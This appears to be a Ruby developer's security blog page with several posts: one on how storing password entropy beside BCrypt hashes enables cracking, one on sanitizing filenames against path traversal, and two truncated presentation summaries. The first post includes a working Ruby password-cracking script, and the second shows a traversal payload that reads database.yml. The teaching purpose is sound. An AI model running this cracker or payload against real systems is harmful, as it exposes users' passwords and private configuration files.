A Tale of Security Gone Wrong

ruby, security

I was approached recently by a friend (you can call him Jon) who had a security story to share with me. It was an interesting scenario that could have been dire for his team had they:

  1. Not discovered the problem
  2. Been breached

Wanting to improve the security of their application, Jon’s team decided to implement a password entropy feature to encourage their users to use strong passwords. This is a useful feature that companies like Dropbox, Twitter, and eBay have implemented. Jon’s team decided to use the Zxcvbn library to calculate the entropy. Again, nothing wrong here.

Things went off the rails when Jon’s team decided to store the entropy in the database. The rationale was that as technology progressed and password cracking became easier, users with weaker passwords could be contacted to update them. The trouble is that a stored entropy value significantly weakens the protection a password hashing algorithm provides (Jon’s team was using BCrypt) and decreases the time it takes to brute force the hashed passwords.

Thankfully, this story has a happy ending: Jon’s team discovered the issue during a security audit and yanked the feature immediately.

The rest of this post will examine how storing entropy completely destroys your hashed-password security.

Using Zxcvbn to Calculate Entropy

Dropbox using Zxcvbn

Above you can see an image of Dropbox’s password meter. It’s a series of bars/colors to show relative password strength. The underlying calculations are done with the Zxcvbn library. And the code to use it is quite simple:

require 'zxcvbn'

result = Zxcvbn.test('@lfred2004')
puts result.entropy   # => 14.814

For Jon’s application, when a user entered their password, the app would calculate the entropy value and store it along with the BCrypt hashed password. Below is a simplified version of the Users table.

User table with Entropy stored beside BCrypt hashed passwords

If you don’t think about security on a regular basis, this probably looks normal. The next question to ask is: how can an adversary with the Users table exploit the entropy value and crack passwords?

Why Storing Entropy is a Terrible Idea!

You see, a stored entropy value leaks information. When it comes to passwords (and secure systems in general) you want to leak as little information as possible. Otherwise an attacker has information they can use to their advantage. To understand how an attacker leverages this information, you need to know a few things about hashing speeds.
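As a rough way to get a feel for the speed gap, here is a minimal sketch that uses only Ruby's standard library. It does not use BCrypt: PBKDF2 is swapped in as a stand-in for a deliberately slow password hash, and the candidate list, salt, iteration count, and method names are all assumptions made for illustration. Absolute timings will differ from machine to machine.

```ruby
require 'benchmark'
require 'digest'
require 'openssl'

# Hypothetical candidate list, for illustration only.
CANDIDATES = Array.new(50) { |i| "password#{i}" }.freeze
# Fixed salt, only to keep the sketch short; real systems use a random salt per user.
SALT = 'illustrative-salt'

# Seconds needed to hash every candidate with a fast, general-purpose hash.
def time_md5(candidates)
  Benchmark.realtime { candidates.each { |pwd| Digest::MD5.hexdigest(pwd) } }
end

# Seconds needed to hash every candidate with PBKDF2, a deliberately slow
# key derivation function used here as a stand-in for BCrypt.
def time_pbkdf2(candidates, iterations: 20_000)
  Benchmark.realtime do
    candidates.each do |pwd|
      OpenSSL::KDF.pbkdf2_hmac(pwd, salt: SALT, iterations: iterations,
                                    length: 32, hash: 'sha256')
    end
  end
end

puts format('MD5:    %.6f s', time_md5(CANDIDATES))
puts format('PBKDF2: %.6f s', time_pbkdf2(CANDIDATES))
```

The slow function should take orders of magnitude longer per guess, which is exactly the cost an attacker wants to avoid paying for every candidate.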

Table of hash algorithm timing

The timing table above shows that BCrypt takes a long time to do 10,000 password hashes compared to MD5/SHA1. BCrypt was designed to make brute forcing password hashes expensive, whereas MD5 and SHA1 weren’t designed with that consideration. Which leads us to ask: how long does it take to calculate Zxcvbn values?

Table of Zxcvbn timing along with hash algorithm timing

You can see from the above image that Zxcvbn takes significantly less time to run 10,000 iterations than BCrypt – 124x faster. The implication then is that you can input passwords into Zxcvbn and generate a subset of candidate passwords which can then be hashed with BCrypt. The algorithm is going to look like this:

A visual diagram detailing the entropy cracking steps

  1. Get a list of common passwords (the bigger the better)
  2. Run the common passwords through Zxcvbn to get an entropy value
  3. Use entropy as a hash key, store the password as a value in an array
  4. Sort Users table by lowest to highest entropy
  5. Iterate the Users table and use the entropy column to index your hash
    • If a hash key is present:
      • The array stored under that key holds the candidate passwords
      • BCrypt the candidate passwords and compare to database hash
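A quick way to see what the steps above buy an attacker is to count the BCrypt comparisons needed per user. The sketch below uses toy bucket sizes chosen purely for illustration (they are not measurements), and the method names are hypothetical.

```ruby
# Toy data: entropy value => number of dictionary passwords with that entropy.
BUCKET_SIZES = { 0.0 => 4, 11.236 => 2, 11.784 => 3, 17.434 => 100 }.freeze

# BCrypt comparisons needed for one user when the entropy is unknown:
# every dictionary password has to be tried.
def guesses_without_entropy(bucket_sizes)
  bucket_sizes.values.sum
end

# BCrypt comparisons needed when the stored entropy is known:
# only the passwords in the matching bucket have to be tried.
def guesses_with_entropy(bucket_sizes, entropy)
  bucket_sizes.fetch(entropy, 0)
end

puts guesses_without_entropy(BUCKET_SIZES)        # every password in the dictionary
puts guesses_with_entropy(BUCKET_SIZES, 11.236)   # only the matching bucket
```

With these toy numbers, a user whose stored entropy is 11.236 costs 2 slow comparisons instead of 109, and a user whose entropy matches no bucket can be skipped without hashing anything.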

Writing a Cracker

Let’s write the algorithm described above. Starting with the first 3 steps:

require 'zxcvbn'

tester = Zxcvbn::Tester.new
entropies = {}

# File.readlines closes the file for us; chomp: true strips the trailing newlines
dictionary_pwds = File.readlines("common_passwords.txt", chomp: true)

dictionary_pwds.each do |pwd|
  value = tester.test(pwd).entropy

  entropies[value] ||= []
  entropies[value] << pwd
end

The result of the above is a hash of arrays with the key being the entropy for the passwords in the value array:

{
  0.0    => [ 'password', 'james', 'smith', 'mary' ],
  11.784 => [ 'Turkey50', 'zigzag', 'bearcat' ],
  11.236 => [ 'samsung1', 'istheman' ],
  ...
  17.434 => [ '01012011', '01011980', ... '01011910' ],
  ...
}

The next part of the algorithm loads the database, sorts by lowest to highest entropy (easiest to hardest), and tries to crack the password:

require 'sqlite3'
require 'bcrypt'

# Open a SQLite 3 database file
db = SQLite3::Database.new 'entropy.sqlite3'

db.execute("SELECT * FROM users ORDER BY entropy") do |user|
  # Load user record
  email       = user[1]
  pwd_hash    = user[6]
  pwd_entropy = user[7]

  puts "User: #{email}, entropy: #{pwd_entropy}, password_hash: #{pwd_hash} "

  # Only the dictionary passwords with this exact entropy need to be hashed
  candidate_passwords = entropies[pwd_entropy]
  if candidate_passwords
    # Parse the stored hash once, then compare each candidate against it
    stored_hash = BCrypt::Password.new(pwd_hash)
    passwords = candidate_passwords.select do |candidate|
      stored_hash == candidate
    end

    # Should be 0 or 1 -- if > 1, something is wrong
    if passwords.empty?
      puts "No Matching Candidates"
    elsif passwords.length == 1
      puts "Password is: #{passwords.first}"
    end
  else
    puts "No Candidates Found"
  end
end

And that’s it. There’s nothing overly difficult in this algorithm. It’s basically 3 loops and a couple of hash functions, but what drops out is non-trivial. If this were a real database, you’d have email and password combinations flying at you. That’s a real problem: it means you’re losing your users’ information!

As I mentioned, this was a good news story for Jon and his team: they discovered the issue without their database getting compromised and without seeing their names in the news. However, that was not the case for Ashley Madison. That’s right! Ashley Madison made a similar error when they stored an MD5 hash of their users’ passwords in their database alongside the BCrypt hashes. This led researchers to crack almost 1/3 of their 30 million password hashes!

While it’s nice to feel smug and laugh at Ashley Madison’s peril, there is a real possibility that you’ve done something equally compromising in your own database. I’ve posted the code and an example database on GitHub. Take a look at the code and see if you can write your own cracker.

Security for JS Developers: A Presentation

other, presentations, security

On Feb 16th, 2016 I gave a presentation to yycjs on security for JS developers. The presentation covers:

The above link will take you to detailed explanations on the topic I’ve done previously, and I’ll work on getting a post developed for the timing attack.

As part of the presentation I used a neat tool called sqlmap which you can read more about. And I also referenced BCrypt multiple times. There are good reads on BCrypt and hashing passwords in 2016.

Creating a Safe Filename Sanitization Function

brakeman, ruby, security

In a previous post on File Access Vulnerabilities I mentioned the use of a sanitize function. Sanitize functions are needed because you don’t always have full control of file names or file paths provided by a user. And when you can’t control file names/paths, the attack surface of your application increases.

This post will work through the creation of a file sanitization function, contrast whitelisting vs blacklisting, and look at a gem to handle sanitization.

Let’s start with an example of code that would need a sanitize function:

def download
  language_code = params[:code]
  send_file(
    "#{Rails.root}/config/locales/#{language_code}.yml",
    filename: "#{language_code}.yml",
    type: "application/yml"
  )
end

This is from a question asked on StackOverflow. The questioner stated that params[:code] was dynamic and couldn’t be determined a priori. They were correct in assessing that this is vulnerable to an attacker submitting an HTTP request with the parameter of: code=../../../config/database. Bam! Compromised database.yml file.

This means that the above function needs to be sanitized so that the system doesn’t get compromised.
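To see why the traversal works, it helps to resolve the path the way the filesystem would. The sketch below is not from the StackOverflow question: LOCALES_DIR and locale_path are hypothetical names, the directory is made up, and the containment check is a complementary safeguard rather than a replacement for sanitizing the input.

```ruby
# Hypothetical locales directory, used only for illustration.
LOCALES_DIR = '/srv/app/config/locales'

# Returns the absolute path for a locale code, or nil when the resolved
# path would land outside of base (i.e. the input contained a traversal).
def locale_path(code, base = LOCALES_DIR)
  # File.expand_path collapses any "../" segments relative to base
  resolved = File.expand_path("#{code}.yml", base)
  resolved.start_with?(base + File::SEPARATOR) ? resolved : nil
end

p locale_path('en')                        # stays inside the locales directory
p locale_path('../database')               # nil: resolves to a file outside of it
p locale_path('../../../config/database')  # nil: resolves to a file outside of it
```

Rejecting anything that resolves outside the intended directory catches traversal attempts even if a sanitize function misses a character.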

Whitelisting vs Blacklisting

There are two main methods you can use to sanitize user input: whitelisting or blacklisting.

  • Whitelisting is the act of setting what characters are allowed.
  • Blacklisting is setting what characters are not allowed.

The distinction is subtle but makes a huge difference for the security and usability of a function.

Generally speaking, you want to reach for a whitelisting function before a blacklisting function. This is because whitelists (if done properly) are safer: you’re stating what is allowed instead of trying to exclude all the bad things that shouldn’t be allowed. With a blacklist you’ll typically miss something and voilà, an attacker has an in. You’re smart, but when someone is motivated they’ll figure out a way to be smarter than you!

This particular instance is nice since the download is restricted to .yml files, meaning you can be extra aggressive in your whitelisting. Let’s write a naive whitelist function:

def sanitize(filename)
  # Replace any character that isn't 0-9, A-Z, or a-z with an underscore
  filename.gsub(/[^0-9A-Z]/i, '_')
end

In the above case, if you used the malicious string ../../../config/database the output is just what you’d want: _________config_database. The slashes and dots are all replaced and your database.yml is safe. You could have removed the ‘bad’ characters entirely instead of replacing them with an underscore _, but I prefer underscores since they’re more friendly/readable for the normal, non-attacker use case.

But! (there’s always a but) You’ve got some additional considerations. While the above function is safe, it is limited to a minimal character set. What happens if you inserted any of these characters: é 猪 pig into that function? They get stripped out!

In this case, you’re probably ok with that given the context of the files. You likely have full control of the language files so you can make assertions in your sanitization. But that’s not always the case.

This is where whitelists can become unwieldy. As a programmer you don’t want to go and define every single character that you want to allow; that’s tedious. That’s where the blacklist function comes in. Let’s see that:

def sanitize(filename)
  # Bad as defined by wikipedia: https://en.wikipedia.org/wiki/Filename#Reserved_characters_and_words
  # Also have to escape the backslash
  bad_chars = [ '/', '\\', '?', '%', '*', ':', '|', '"', '<', '>', '.', ' ' ]
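  # Work on a copy so the caller's string isn't modified (and frozen strings work)
  sanitized = filename.dup
  bad_chars.each do |bad_char|
    sanitized.gsub!(bad_char, '_')
  end
  sanitized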
end

Using the function, with some weird input: 猪<lǝgit> "input" °?I |s:*w*:é::ä::r: /\.?%ʎן octopus you get the following back (results may vary by OS): 猪_lǝgit___input_°__I__s__w__é__ä__r______ʎן octopus . And while this isn’t the prettiest filename, it’s what the user wanted!

This code is more complex than the whitelisting sanitize, and it’s more permissive. It’s also more user friendly since it’s giving the user what they put in.
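One possible middle ground, offered as a sketch rather than a tested recommendation, is a whitelist built on Unicode character properties instead of an explicit list of characters. Ruby regular expressions support \p{L} (any letter) and \p{N} (any number), so the whitelist stays short while still accepting non-ASCII names. The method name sanitize_unicode is hypothetical, and this sketch does not handle the reserved words mentioned in the next section.

```ruby
def sanitize_unicode(filename)
  # Replace every character that is not a Unicode letter or number
  # with an underscore; returns a new string, the input is untouched.
  filename.gsub(/[^\p{L}\p{N}]/, '_')
end

puts sanitize_unicode('../../../config/database')
puts sanitize_unicode('é猪')
```

The traversal string still collapses to underscores, while letters outside of A-Z pass through unchanged.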

Alternatives

The last piece to mention is alternatives. If you’re looking for a good gem that does this for you I’d recommend Zaru. It handles the same “bad characters” as the blacklist sanitize above, and also handles some Windows edge cases for reserved words. Plus it’s got a test suite, which is a comfort when you’re looking at filename sanitization!

Security for Ruby Developers: A Presentation

presentations, rails, ruby, security

On Jan 5th, 2016 I gave a presentation to YYCRuby on security for Ruby developers. The presentation covers:

If you weren’t present, the slides probably won’t make a whole lot of sense. The above links will take you to detailed explanations of the topics I’ve done previously.

I mentioned in the presentation some fantastic external tools that you can use to secure your app. They are: